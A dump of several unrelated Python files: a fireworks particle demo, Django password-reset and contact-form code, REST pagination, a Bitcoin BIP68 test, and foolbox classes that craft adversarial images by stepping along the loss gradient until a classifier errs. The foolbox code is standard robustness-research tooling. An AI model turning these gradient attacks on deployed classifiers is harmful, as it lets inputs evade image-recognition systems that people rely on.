rocket.change_y = random.uniform(5.0, 7.25)
return rocket
def make_flash(prev_emitter):
"""Return emitter that displays the brief flash when a firework shell explodes"""
return arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(3),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=FLASH_TEXTURE,
change_xy=arcade.rand_in_circle((0.0, 0.0), 3.5),
lifetime=0.15
)
)
def make_puff(prev_emitter):
"""Return emitter that generates the subtle smoke cloud left after a firework shell explodes"""
return arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(4),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=PUFF_TEXTURE,
change_xy=(_Vec2(arcade.rand_in_circle((0.0, 0.0), 0.4)) + _Vec2(0.3, 0.0)).as_tuple(),
lifetime=4.0
)
)
class AnimatedAlphaParticle(arcade.LifetimeParticle):
"""A custom particle that animates between three different alpha levels"""
def __init__(
self,
filename_or_texture: arcade.FilenameOrTexture,
change_xy: Vector,
start_alpha: int = 0,
duration1: float = 1.0,
mid_alpha: int = 255,
duration2: float = 1.0,
end_alpha: int = 0,
center_xy: Point = (0.0, 0.0),
angle: float = 0,
change_angle: float = 0,
scale: float = 1.0,
mutation_callback=None,
):
super().__init__(filename_or_texture, change_xy, duration1 + duration2, center_xy, angle, change_angle, scale, start_alpha, mutation_callback)
self.start_alpha = start_alpha
self.in_duration = duration1
self.mid_alpha = mid_alpha
self.out_duration = duration2
self.end_alpha = end_alpha
def update(self):
super().update()
if self.lifetime_elapsed <= self.in_duration:
u = self.lifetime_elapsed / self.in_duration
self.alpha = arcade.lerp(self.start_alpha, self.mid_alpha, u)
else:
u = (self.lifetime_elapsed - self.in_duration) / self.out_duration
self.alpha = arcade.lerp(self.mid_alpha, self.end_alpha, u)
class RocketEmitter(arcade.Emitter):
"""Custom emitter class to add gravity to the emitter to represent gravity on the firework shell"""
def update(self):
super().update()
# gravity
self.change_y += -0.05
class FireworksApp(arcade.Window):
def __init__(self):
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
# Set the working directory (where we expect to find files) to the same
# directory this .py file is in. You can leave this out of your own
# code, but it is needed to easily run the examples using "python -m"
# as mentioned at the top of this program.
file_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(file_path)
arcade.set_background_color(arcade.color.BLACK)
self.emitters = []
self.frametime_plotter = FrametimePlotter()
self.launch_firework(0)
arcade.schedule(self.launch_spinner, 4.0)
stars = arcade.Emitter(
center_xy=(0.0, 0.0),
emit_controller=arcade.EmitMaintainCount(20),
particle_factory=lambda emitter: AnimatedAlphaParticle(
filename_or_texture=random.choice(STAR_TEXTURES),
change_xy=(0.0, 0.0),
start_alpha=0,
duration1=random.uniform(2.0, 6.0),
mid_alpha=128,
duration2=random.uniform(2.0, 6.0),
end_alpha=0,
center_xy=arcade.rand_in_rect((0.0, 0.0), SCREEN_WIDTH, SCREEN_HEIGHT)
)
)
self.emitters.append(stars)
self.cloud = arcade.Emitter(
center_xy=(50, 500),
change_xy=(0.15, 0),
emit_controller=arcade.EmitMaintainCount(60),
particle_factory=lambda emitter: AnimatedAlphaParticle(
filename_or_texture=random.choice(CLOUD_TEXTURES),
change_xy=(_Vec2(arcade.rand_in_circle((0.0, 0.0), 0.04)) + _Vec2(0.1, 0)).as_tuple(),
start_alpha=0,
duration1=random.uniform(5.0, 10.0),
mid_alpha=255,
duration2=random.uniform(5.0, 10.0),
end_alpha=0,
center_xy=arcade.rand_in_circle((0.0, 0.0), 50)
)
)
self.emitters.append(self.cloud)
def launch_firework(self, delta_time):
self.frametime_plotter.add_event("launch")
launchers = (
self.launch_random_firework,
self.launch_ringed_firework,
self.launch_sparkle_firework,
)
random.choice(launchers)(delta_time)
pyglet.clock.schedule_once(self.launch_firework, random.uniform(LAUNCH_INTERVAL_MIN, LAUNCH_INTERVAL_MAX))
def launch_random_firework(self, delta_time):
"""Simple firework that explodes in a random color"""
rocket = make_rocket(self.explode_firework)
self.emitters.append(rocket)
def launch_ringed_firework(self, delta_time):
""""Firework that has a basic explosion and a ring of sparks of a different color"""
rocket = make_rocket(self.explode_ringed_firework)
self.emitters.append(rocket)
def launch_sparkle_firework(self, delta_time):
"""Firework which has sparks that sparkle"""
rocket = make_rocket(self.explode_sparkle_firework)
self.emitters.append(rocket)
def launch_spinner(self, delta_time):
"""Start the spinner that throws sparks"""
spinner1 = make_spinner()
spinner2 = make_spinner()
spinner2.angle = 180
self.emitters.append(spinner1)
self.emitters.append(spinner2)
def explode_firework(self, prev_emitter):
"""Actions that happen when a firework shell explodes, resulting in a typical firework"""
self.emitters.append(make_puff(prev_emitter))
self.emitters.append(make_flash(prev_emitter))
spark_texture = random.choice(SPARK_TEXTURES)
sparks = arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(random.randint(30, 40)),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=spark_texture,
change_xy=arcade.rand_in_circle((0.0, 0.0), 9.0),
lifetime=random.uniform(0.5, 1.2),
mutation_callback=firework_spark_mutator
)
)
self.emitters.append(sparks)
def explode_ringed_firework(self, prev_emitter):
"""Actions that happen when a firework shell explodes, resulting in a ringed firework"""
self.emitters.append(make_puff(prev_emitter))
self.emitters.append(make_flash(prev_emitter))
spark_texture, ring_texture = random.choice(SPARK_PAIRS)
sparks = arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(25),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=spark_texture,
change_xy=arcade.rand_in_circle((0.0, 0.0), 8.0),
lifetime=random.uniform(0.55, 0.8),
mutation_callback=firework_spark_mutator
)
)
self.emitters.append(sparks)
ring = arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(20),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=ring_texture,
change_xy=arcade.rand_on_circle((0.0, 0.0), 5.0) + arcade.rand_in_circle((0.0, 0.0), 0.25),
lifetime=random.uniform(1.0, 1.6),
mutation_callback=firework_spark_mutator
)
)
self.emitters.append(ring)
def explode_sparkle_firework(self, prev_emitter):
"""Actions that happen when a firework shell explodes, resulting in a sparkling firework"""
self.emitters.append(make_puff(prev_emitter))
self.emitters.append(make_flash(prev_emitter))
spark_texture = random.choice(SPARK_TEXTURES)
sparks = arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(random.randint(30, 40)),
particle_factory=lambda emitter: AnimatedAlphaParticle(
filename_or_texture=spark_texture,
change_xy=arcade.rand_in_circle((0.0, 0.0), 9.0),
start_alpha=255,
duration1=random.uniform(0.6, 1.0),
mid_alpha=0,
duration2=random.uniform(0.1, 0.2),
end_alpha=255,
mutation_callback=firework_spark_mutator
)
)
self.emitters.append(sparks)
def update(self, delta_time):
# prevent list from being mutated (often by callbacks) while iterating over it
emitters_to_update = self.emitters.copy()
# update cloud
if self.cloud.center_x > SCREEN_WIDTH:
self.cloud.center_x = 0
# update
for e in emitters_to_update:
e.update()
# remove emitters that can be reaped
to_del = [e for e in emitters_to_update if e.can_reap()]
for e in to_del:
self.emitters.remove(e)
self.frametime_plotter.end_frame(delta_time)
def on_draw(self):
arcade.start_render()
for e in self.emitters:
e.draw()
arcade.draw_lrtb_rectangle_filled(0, SCREEN_WIDTH, 25, 0, arcade.color.DARK_GREEN)
mid = SCREEN_WIDTH / 2
arcade.draw_lrtb_rectangle_filled(mid-2, mid+2, SPINNER_HEIGHT, 10, arcade.color.DARK_BROWN)
def on_key_press(self, key, modifiers):
if key == arcade.key.ESCAPE:
arcade.close_window()
def firework_spark_mutator(emitter: arcade.Emitter):
"""mutation_callback shared by all fireworks sparks"""
# gravity
emitter.change_y += -0.03
# drag
emitter.change_x *= 0.92
emitter.change_y *= 0.92
def rocket_smoke_mutator(emitter: arcade.Emitter):
emitter.scale = arcade.lerp(0.5, 3.0, emitter.lifetime_elapsed/emitter.lifetime_original)
# A Sprite's scale doesn't affect generated textures (ex: make_soft_circle_texture) or scale being animated over time.
# The fix below is copied from Sprite.update_animation().
# Bug may have been recorded here: https://github.com/pvcraven/arcade/issues/331
emitter.width = emitter._texture.width * emitter.scale
emitter.height = emitter._texture.height * emitter.scale
if __name__ == "__main__":
app = FireworksApp()
arcade.run()
app.frametime_plotter.show()
|
py | b40b57e9a4b3e9b45c191b0e0c556482073145f4 | from urllib.parse import urljoin
from django.contrib.auth.forms import PasswordResetForm
from rest_auth.serializers import PasswordResetSerializer
from rssant_common.standby_domain import get_request_root_url
from .settings import DEFAULT_FROM_EMAIL
from .email_template import RESET_PASSWORD_TEMPLATE
class RssantPasswordResetForm(PasswordResetForm):
def __init__(self, *args, **kwargs):
self._request = None
super().__init__(*args, **kwargs)
def get_from_email(self):
"""
This is a hook that can be overridden to programatically
set the 'from' email address for sending emails
"""
return DEFAULT_FROM_EMAIL
def send_mail(self, subject_template_name, email_template_name,
context, from_email, to_email, html_email_template_name=None):
link = 'reset-password/{}?token={}'.format(context['uid'], context['token'])
root_url = get_request_root_url(self._request)
link = urljoin(root_url, link)
my_context = dict(rssant_url=root_url, email=to_email, link=link)
RESET_PASSWORD_TEMPLATE.send(self.get_from_email(), to_email, my_context)
def save(self, *args, **kwargs):
self._request = kwargs.get('request')
super().save(*args, **kwargs)
class RssantPasswordResetSerializer(PasswordResetSerializer):
password_reset_form_class = RssantPasswordResetForm
|
py | b40b5a6316ceabcf5296d1fc59b860aa984bb8be | from collections import OrderedDict
from django.utils.translation import ugettext_lazy as _
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from rest_framework.utils.urls import remove_query_param, replace_query_param
class PaginationPermissionsMixin(object):
"""
Interface for listing permissions in a paginated response.
"""
def __init__(self, *args, **kwargs):
self.permissions = None
def set_permissions(self, permissions):
self.permissions = permissions
class LinksPageNumberPagination(PaginationPermissionsMixin, PageNumberPagination):
"""
Decorates the page number paginagtion with _links for navigation and
extra properties like total page count, result count, etc.
"""
# Page size parameter configuration.
page_size_query_param = 'limit'
# Page size configuration.
page_size = 100
max_page_size = 500
def __init__(self):
super(LinksPageNumberPagination, self).__init__()
self.links = []
def add_link(self, link):
self.links.append(link)
def get_paginated_response(self, data):
content = [
('_links', OrderedDict([
('first', self.get_first_link()),
('last', self.get_last_link()),
('next', self.get_next_link()),
('previous', self.get_previous_link()),
] + self.links))
]
if self.permissions:
content.append(('_permissions', self.permissions))
content.append(('count', self.page.paginator.count))
content.append(('pages', self.page.paginator.num_pages))
content.append(('current_page', self.page.number))
content.append(('per_page', self.page.paginator.per_page))
content.append(('results', data))
return Response(OrderedDict(content))
def get_first_link(self):
url = self.request.build_absolute_uri()
return remove_query_param(url, self.page_query_param)
def get_last_link(self):
page_count = self.page.paginator.num_pages
if not page_count > 1:
return self.get_first_link()
url = self.request.build_absolute_uri()
return replace_query_param(url, self.page_query_param, page_count)
def paginate_queryset(self, queryset, request, view=None):
# Skip pagination when csv export is requested
if request.GET.get('format', '') == 'csv':
return None
return super(LinksPageNumberPagination, self).paginate_queryset(queryset, request, view) |
py | b40b5a848a29693c8cd4f8f83102c519353ecd2b | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test BIP68 implementation."""
import time
from test_framework.blocktools import create_block, create_coinbase, add_witness_commitment
from test_framework.messages import COIN, COutPoint, CTransaction, CTxIn, CTxOut, FromHex, ToHex
from test_framework.script import CScript
from test_framework.test_framework import BitcoinrandTestFramework
from test_framework.util import assert_equal, assert_greater_than, assert_raises_rpc_error, bytes_to_hex_str, get_bip9_status, satoshi_round, sync_blocks
SEQUENCE_LOCKTIME_DISABLE_FLAG = (1<<31)
SEQUENCE_LOCKTIME_TYPE_FLAG = (1<<22) # this means use time (0 means height)
SEQUENCE_LOCKTIME_GRANULARITY = 9 # this is a bit-shift
SEQUENCE_LOCKTIME_MASK = 0x0000ffff
# RPC error for non-BIP68 final transactions
NOT_FINAL_ERROR = "non-BIP68-final (code 64)"
class BIP68Test(BitcoinrandTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.extra_args = [[], ["-acceptnonstdtxn=0"]]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.relayfee = self.nodes[0].getnetworkinfo()["relayfee"]
# Generate some coins
self.nodes[0].generate(110)
self.log.info("Running test disable flag")
self.test_disable_flag()
self.log.info("Running test sequence-lock-confirmed-inputs")
self.test_sequence_lock_confirmed_inputs()
self.log.info("Running test sequence-lock-unconfirmed-inputs")
self.test_sequence_lock_unconfirmed_inputs()
self.log.info("Running test BIP68 not consensus before versionbits activation")
self.test_bip68_not_consensus()
self.log.info("Activating BIP68 (and 112/113)")
self.activateCSV()
self.log.info("Verifying nVersion=2 transactions are standard.")
self.log.info("Note that nVersion=2 transactions are always standard (independent of BIP68 activation status).")
self.test_version2_relay()
self.log.info("Passed")
# Test that BIP68 is not in effect if tx version is 1, or if
# the first sequence bit is set.
def test_disable_flag(self):
# Create some unconfirmed inputs
new_addr = self.nodes[0].getnewaddress()
self.nodes[0].sendtoaddress(new_addr, 2) # send 2 BZAR
utxos = self.nodes[0].listunspent(0, 0)
assert(len(utxos) > 0)
utxo = utxos[0]
tx1 = CTransaction()
value = int(satoshi_round(utxo["amount"] - self.relayfee)*COIN)
# Check that the disable flag disables relative locktime.
# If sequence locks were used, this would require 1 block for the
# input to mature.
sequence_value = SEQUENCE_LOCKTIME_DISABLE_FLAG | 1
tx1.vin = [CTxIn(COutPoint(int(utxo["txid"], 16), utxo["vout"]), nSequence=sequence_value)]
tx1.vout = [CTxOut(value, CScript([b'a']))]
tx1_signed = self.nodes[0].signrawtransactionwithwallet(ToHex(tx1))["hex"]
tx1_id = self.nodes[0].sendrawtransaction(tx1_signed)
tx1_id = int(tx1_id, 16)
# This transaction will enable sequence-locks, so this transaction should
# fail
tx2 = CTransaction()
tx2.nVersion = 2
sequence_value = sequence_value & 0x7fffffff
tx2.vin = [CTxIn(COutPoint(tx1_id, 0), nSequence=sequence_value)]
tx2.vout = [CTxOut(int(value - self.relayfee * COIN), CScript([b'a' * 35]))]
tx2.rehash()
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, ToHex(tx2))
# Setting the version back down to 1 should disable the sequence lock,
# so this should be accepted.
tx2.nVersion = 1
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Calculate the median time past of a prior block ("confirmations" before
# the current tip).
def get_median_time_past(self, confirmations):
block_hash = self.nodes[0].getblockhash(self.nodes[0].getblockcount()-confirmations)
return self.nodes[0].getblockheader(block_hash)["mediantime"]
# Test that sequence locks are respected for transactions spending confirmed inputs.
def test_sequence_lock_confirmed_inputs(self):
# Create lots of confirmed utxos, and use them to generate lots of random
# transactions.
max_outputs = 50
addresses = []
while len(addresses) < max_outputs:
addresses.append(self.nodes[0].getnewaddress())
while len(self.nodes[0].listunspent()) < 200:
import random
random.shuffle(addresses)
num_outputs = random.randint(1, max_outputs)
outputs = {}
for i in range(num_outputs):
outputs[addresses[i]] = random.randint(1, 20)*0.01
self.nodes[0].sendmany("", outputs)
self.nodes[0].generate(1)
utxos = self.nodes[0].listunspent()
# Try creating a lot of random transactions.
# Each time, choose a random number of inputs, and randomly set
# some of those inputs to be sequence locked (and randomly choose
# between height/time locking). Small random chance of making the locks
# all pass.
for i in range(400):
# Randomly choose up to 10 inputs
num_inputs = random.randint(1, 10)
random.shuffle(utxos)
# Track whether any sequence locks used should fail
should_pass = True
# Track whether this transaction was built with sequence locks
using_sequence_locks = False
tx = CTransaction()
tx.nVersion = 2
value = 0
for j in range(num_inputs):
sequence_value = 0xfffffffe # this disables sequence locks
# 50% chance we enable sequence locks
if random.randint(0,1):
using_sequence_locks = True
# 10% of the time, make the input sequence value pass
input_will_pass = (random.randint(1,10) == 1)
sequence_value = utxos[j]["confirmations"]
if not input_will_pass:
sequence_value += 1
should_pass = False
# Figure out what the median-time-past was for the confirmed input
# Note that if an input has N confirmations, we're going back N blocks
# from the tip so that we're looking up MTP of the block
# PRIOR to the one the input appears in, as per the BIP68 spec.
orig_time = self.get_median_time_past(utxos[j]["confirmations"])
cur_time = self.get_median_time_past(0) # MTP of the tip
# can only timelock this input if it's not too old -- otherwise use height
can_time_lock = True
if ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY) >= SEQUENCE_LOCKTIME_MASK:
can_time_lock = False
# if time-lockable, then 50% chance we make this a time lock
if random.randint(0,1) and can_time_lock:
# Find first time-lock value that fails, or latest one that succeeds
time_delta = sequence_value << SEQUENCE_LOCKTIME_GRANULARITY
if input_will_pass and time_delta > cur_time - orig_time:
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)
elif (not input_will_pass and time_delta <= cur_time - orig_time):
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)+1
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx.vin.append(CTxIn(COutPoint(int(utxos[j]["txid"], 16), utxos[j]["vout"]), nSequence=sequence_value))
value += utxos[j]["amount"]*COIN
# Overestimate the size of the tx - signatures should be less than 120 bytes, and leave 50 for the output
tx_size = len(ToHex(tx))//2 + 120*num_inputs + 50
tx.vout.append(CTxOut(int(value-self.relayfee*tx_size*COIN/1000), CScript([b'a'])))
rawtx = self.nodes[0].signrawtransactionwithwallet(ToHex(tx))["hex"]
if (using_sequence_locks and not should_pass):
# This transaction should be rejected
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, rawtx)
else:
# This raw transaction should be accepted
self.nodes[0].sendrawtransaction(rawtx)
utxos = self.nodes[0].listunspent()
# Test that sequence locks on unconfirmed inputs must have nSequence
# height or time of 0 to be accepted.
# Then test that BIP68-invalid transactions are removed from the mempool
# after a reorg.
def test_sequence_lock_unconfirmed_inputs(self):
# Store height so we can easily reset the chain at the end of the test
cur_height = self.nodes[0].getblockcount()
# Create a mempool tx.
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Anyone-can-spend mempool tx.
# Sequence lock of 0 should pass.
tx2 = CTransaction()
tx2.nVersion = 2
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
tx2_raw = self.nodes[0].signrawtransactionwithwallet(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(tx2_raw)
# Create a spend of the 0th output of orig_tx with a sequence lock
# of 1, and test what happens when submitting.
# orig_tx.vout[0] must be an anyone-can-spend output
def test_nonzero_locks(orig_tx, node, relayfee, use_height_lock):
sequence_value = 1
if not use_height_lock:
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx = CTransaction()
tx.nVersion = 2
tx.vin = [CTxIn(COutPoint(orig_tx.sha256, 0), nSequence=sequence_value)]
tx.vout = [CTxOut(int(orig_tx.vout[0].nValue - relayfee * COIN), CScript([b'a' * 35]))]
tx.rehash()
if (orig_tx.hash in node.getrawmempool()):
# sendrawtransaction should fail if the tx is in the mempool
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, node.sendrawtransaction, ToHex(tx))
else:
# sendrawtransaction should succeed if the tx is not in the mempool
node.sendrawtransaction(ToHex(tx))
return tx
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Now mine some blocks, but make sure tx2 doesn't get mined.
# Use prioritisetransaction to lower the effective feerate to 0
self.nodes[0].prioritisetransaction(txid=tx2.hash, fee_delta=int(-self.relayfee*COIN))
cur_time = int(time.time())
for i in range(10):
self.nodes[0].setmocktime(cur_time + 600)
self.nodes[0].generate(1)
cur_time += 600
assert(tx2.hash in self.nodes[0].getrawmempool())
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Mine tx2, and then try again
self.nodes[0].prioritisetransaction(txid=tx2.hash, fee_delta=int(self.relayfee*COIN))
# Advance the time on the node so that we can test timelocks
self.nodes[0].setmocktime(cur_time+600)
self.nodes[0].generate(1)
assert(tx2.hash not in self.nodes[0].getrawmempool())
# Now that tx2 is not in the mempool, a sequence locked spend should
# succeed
tx3 = test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
assert(tx3.hash in self.nodes[0].getrawmempool())
self.nodes[0].generate(1)
assert(tx3.hash not in self.nodes[0].getrawmempool())
# One more test, this time using height locks
tx4 = test_nonzero_locks(tx3, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx4.hash in self.nodes[0].getrawmempool())
# Now try combining confirmed and unconfirmed inputs
tx5 = test_nonzero_locks(tx4, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx5.hash not in self.nodes[0].getrawmempool())
utxos = self.nodes[0].listunspent()
tx5.vin.append(CTxIn(COutPoint(int(utxos[0]["txid"], 16), utxos[0]["vout"]), nSequence=1))
tx5.vout[0].nValue += int(utxos[0]["amount"]*COIN)
raw_tx5 = self.nodes[0].signrawtransactionwithwallet(ToHex(tx5))["hex"]
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, raw_tx5)
# Test mempool-BIP68 consistency after reorg
#
# State of the transactions in the last blocks:
# ... -> [ tx2 ] -> [ tx3 ]
# tip-1 tip
# And currently tx4 is in the mempool.
#
# If we invalidate the tip, tx3 should get added to the mempool, causing
# tx4 to be removed (fails sequence-lock).
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
assert(tx4.hash not in self.nodes[0].getrawmempool())
assert(tx3.hash in self.nodes[0].getrawmempool())
# Now mine 2 empty blocks to reorg out the current tip (labeled tip-1 in
# diagram above).
# This would cause tx2 to be added back to the mempool, which in turn causes
# tx3 to be removed.
tip = int(self.nodes[0].getblockhash(self.nodes[0].getblockcount()-1), 16)
height = self.nodes[0].getblockcount()
for i in range(2):
block = create_block(tip, create_coinbase(height), cur_time)
block.nVersion = 3
block.rehash()
block.solve()
tip = block.sha256
height += 1
self.nodes[0].submitblock(ToHex(block))
cur_time += 1
mempool = self.nodes[0].getrawmempool()
assert(tx3.hash not in mempool)
assert(tx2.hash in mempool)
# Reset the chain and get rid of the mocktimed-blocks
self.nodes[0].setmocktime(0)
self.nodes[0].invalidateblock(self.nodes[0].getblockhash(cur_height+1))
self.nodes[0].generate(10)
# Make sure that BIP68 isn't being used to validate blocks, prior to
# versionbits activation. If more blocks are mined prior to this test
# being run, then it's possible the test has activated the soft fork, and
# this test should be moved to run earlier, or deleted.
def test_bip68_not_consensus(self):
assert(get_bip9_status(self.nodes[0], 'csv')['status'] != 'active')
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Make an anyone-can-spend transaction
tx2 = CTransaction()
tx2.nVersion = 1
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
# sign tx2
tx2_raw = self.nodes[0].signrawtransactionwithwallet(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Now make an invalid spend of tx2 according to BIP68
sequence_value = 100 # 100 block relative locktime
tx3 = CTransaction()
tx3.nVersion = 2
tx3.vin = [CTxIn(COutPoint(tx2.sha256, 0), nSequence=sequence_value)]
tx3.vout = [CTxOut(int(tx2.vout[0].nValue - self.relayfee * COIN), CScript([b'a' * 35]))]
tx3.rehash()
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, ToHex(tx3))
# make a block that violates bip68; ensure that the tip updates
tip = int(self.nodes[0].getbestblockhash(), 16)
block = create_block(tip, create_coinbase(self.nodes[0].getblockcount()+1))
block.nVersion = 3
block.vtx.extend([tx1, tx2, tx3])
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
add_witness_commitment(block)
block.solve()
self.nodes[0].submitblock(bytes_to_hex_str(block.serialize(True)))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
def activateCSV(self):
# activation should happen at block height 432 (3 periods)
# getblockchaininfo will show CSV as active at block 431 (144 * 3 -1) since it's returning whether CSV is active for the next block.
min_activation_height = 432
height = self.nodes[0].getblockcount()
assert_greater_than(min_activation_height - height, 2)
self.nodes[0].generate(min_activation_height - height - 2)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], "locked_in")
self.nodes[0].generate(1)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], "active")
sync_blocks(self.nodes)
# Use self.nodes[1] to test that version 2 transactions are standard.
def test_version2_relay(self):
inputs = [ ]
outputs = { self.nodes[1].getnewaddress() : 1.0 }
rawtx = self.nodes[1].createrawtransaction(inputs, outputs)
rawtxfund = self.nodes[1].fundrawtransaction(rawtx)['hex']
tx = FromHex(CTransaction(), rawtxfund)
tx.nVersion = 2
tx_signed = self.nodes[1].signrawtransactionwithwallet(ToHex(tx))["hex"]
self.nodes[1].sendrawtransaction(tx_signed)
if __name__ == '__main__':
BIP68Test().main()
|
py | b40b5cf465a6cd8fddb9edd81c2a4397edccce39 | from __future__ import division
import numpy as np
from collections import Iterable
import logging
from foolbox.attacks.base import *
class GradientAttack(Attack):
"""Perturbs the image with the gradient of the loss w.r.t. the image,
gradually increasing the magnitude until the image is misclassified.
Does not do anything if the model does not have a gradient.
"""
@call_decorator
def __call__(self, input_or_adv, label=None, unpack=True,
epsilons=1000, max_epsilon=1):
"""Perturbs the image with the gradient of the loss w.r.t. the image,
gradually increasing the magnitude until the image is misclassified.
Parameters
----------
input_or_adv : `numpy.ndarray` or :class:`Adversarial`
The original, unperturbed input as a `numpy.ndarray` or
an :class:`Adversarial` instance.
label : int
The reference label of the original input. Must be passed
if `a` is a `numpy.ndarray`, must not be passed if `a` is
an :class:`Adversarial` instance.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
epsilons : int or Iterable[float]
Either Iterable of step sizes in the gradient direction
or number of step sizes between 0 and max_epsilon that should
be tried.
max_epsilon : float
Largest step size if epsilons is not an iterable.
"""
a = input_or_adv
del input_or_adv
del label
del unpack
if not a.has_gradient():
return
image = a.original_image
min_, max_ = a.bounds()
gradient = a.gradient()
gradient_norm = np.sqrt(np.mean(np.square(gradient)))
gradient = gradient / (gradient_norm + 1e-8) * (max_ - min_)
if not isinstance(epsilons, Iterable):
epsilons = np.linspace(0, max_epsilon, num=epsilons + 1)[1:]
decrease_if_first = True
else:
decrease_if_first = False
for _ in range(2): # to repeat with decreased epsilons if necessary
for i, epsilon in enumerate(epsilons):
perturbed = image + gradient * epsilon
perturbed = np.clip(perturbed, min_, max_)
_, is_adversarial = a.predictions(perturbed)
if is_adversarial:
if decrease_if_first and i < 20:
logging.info('repeating attack with smaller epsilons')
break
return
max_epsilon = epsilons[i]
epsilons = np.linspace(0, max_epsilon, num=20 + 1)[1:]
class IterativeGradientAttack(Attack):
"""Like GradientAttack but with several steps for each epsilon.
"""
@call_decorator
def __call__(self, input_or_adv, label=None, unpack=True,
epsilons=100, steps=10):
"""Like GradientAttack but with several steps for each epsilon.
Parameters
----------
input_or_adv : `numpy.ndarray` or :class:`Adversarial`
The original, unperturbed input as a `numpy.ndarray` or
an :class:`Adversarial` instance.
label : int
The reference label of the original input. Must be passed
if `a` is a `numpy.ndarray`, must not be passed if `a` is
an :class:`Adversarial` instance.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
epsilons : int or Iterable[float]
Either Iterable of step sizes in the gradient direction
or number of step sizes between 0 and max_epsilon that should
be tried.
max_epsilon : float
Largest step size if epsilons is not an iterable.
"""
a = input_or_adv
del input_or_adv
del label
del unpack
if not a.has_gradient():
return
image = a.original_image
min_, max_ = a.bounds()
if not isinstance(epsilons, Iterable):
assert isinstance(epsilons, int)
epsilons = np.linspace(0, 1 / steps, num=epsilons + 1)[1:]
for epsilon in epsilons:
perturbed = image
for _ in range(steps):
gradient = a.gradient(perturbed)
gradient_norm = np.sqrt(np.mean(np.square(gradient)))
gradient = gradient / (gradient_norm + 1e-8) * (max_ - min_)
perturbed = perturbed + gradient * epsilon
perturbed = np.clip(perturbed, min_, max_)
a.predictions(perturbed)
# we don't return early if an adversarial was found
# because there might be a different epsilon
# and/or step that results in a better adversarial
|
py | b40b5d8ad4bc12fd00786f1c1eceaab78a727ab9 | # sendemail/views.py
from django.core.mail import send_mail, BadHeaderError
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from .models import ContactsModel
from .forms import ContactsModelForm
from django.urls import reverse
from .forms import CustomUserCreationForm
from django.contrib.auth import login
def validateEmail( email ):
try:
validate_email(email)
return True
except ValidationError:
return False
def contactView(request):
if request.method == 'GET':
form = ContactsModelForm()
elif request.method == 'POST':
form = ContactsModelForm(request.POST)
if form.is_valid():
subject = form.cleaned_data['subject']
from_email = form.cleaned_data['from_email']
validateEmail(from_email)
repeat_email = form.cleaned_data['repeat_email']
validateEmail(repeat_email)
message = form.cleaned_data['message']
u = form.save()
print({'form': form})
try:
